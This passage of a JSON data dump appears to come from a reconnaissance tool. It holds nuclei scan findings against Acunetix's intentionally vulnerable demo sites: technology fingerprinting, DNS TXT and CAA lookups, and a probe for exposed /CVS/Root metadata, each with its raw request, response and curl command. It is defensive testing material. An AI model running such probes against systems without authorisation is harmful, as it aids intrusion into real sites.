document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id="mainLayer" style="position:absolute; width:700px; z-index:1">\n<div id="masthead"> \n <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> \n <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>\n <div id="globalNav"> \n \t<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>\n\t<td align="left">\n\t\t<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists\n\t\t</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | \n\t\t<a href="guestbook.php">guestbook</a> | \n\t\t<a href="AJAX/index.php">AJAX Demo</a>\n\t</td>\n\t<td align="right">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name="content_rgn" -->\n<div id="content">\n\t<h2 id="pageName">welcome to our page</h2>\n\t <div class="story">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id="navBar"> \n <div id="search"> \n <form action="search.php?test=query" method="post"> \n <label>search art</label> \n <input name="searchFor" type="text" size="10"> \n <input name="goButton" type="submit" value="go"> \n </form> \n </div> \n <div id="sectionLinks"> \n <ul> \n <li><a href="categories.php">Browse categories</a></li> \n <li><a href="artists.php">Browse artists</a></li> \n <li><a href="cart.php">Your cart</a></li> \n <li><a href="login.php">Signup</a></li>\n\t <li><a href="userinfo.php">Your profile</a></li>\n\t <li><a href="guestbook.php">Our guestbook</a></li>\n\t\t<li><a href="AJAX/index.php">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class="relatedLinks"> \n <h3>Links</h3> \n <ul> \n <li><a href="http://www.acunetix.com">Security art</a></li> \n\t <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li>\n\t <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>\n\t <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id="advert"> \n <p>\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">\n <param name="movie" value="Flash/add.swf">\n <param name=quality value=high>\n <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px">\n<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 196, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Root", + "discovered_date": "2024-11-13T02:34:51.679Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Root HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:47 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 197, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "google-font-api", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:34:51.749Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 198, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:31.0) Gecko/20100101 Firefox/31.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop", + "discovered_date": "2024-11-13T02:34:51.819Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:31.0) Gecko/20100101 Firefox/31.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:47 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<html>\r\n<div id="content">\r\n\t<div class='product'><table><tr><td width='180px'><img src='images/1.jpg'></td><td width='400px'><a href='Details/network-attached-storage-dlink/1/'>Network Storage D-Link DNS-313 enclosure 1 x SATA</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/network-attached-storage-dlink/1/'>Price<br>359 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/2.jpg'></td><td width='400px'><a href='Details/web-camera-a4tech/2/'>Web Camera A4Tech PK-335E</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/web-camera-a4tech/2/'>Price<br>10 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/3.jpg'></td><td width='400px'><a href='Details/color-printer/3/'>Laser Color Printer HP LaserJet M551dn, A4</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/color-printer/3/'>Price<br>812 &euro;</a></td></table></tr></div></div>\r\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 199, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:51.895Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 53467\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 53467\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3594\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 200, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:51.989Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 17673\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 17673\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3594\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 201, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:52.103Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 63414\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 63414\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3595\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 202, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:52.205Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 53665\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 53665\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3594\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 203, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:52.324Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 28261\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 28261\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3593\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 204, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:52.431Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 57568\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 57568\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86394\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 205, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:52.541Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 15282\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 15282\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1793\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 206, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:52.669Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 58040\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 58040\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86394\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 207, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:52.767Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 26721\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 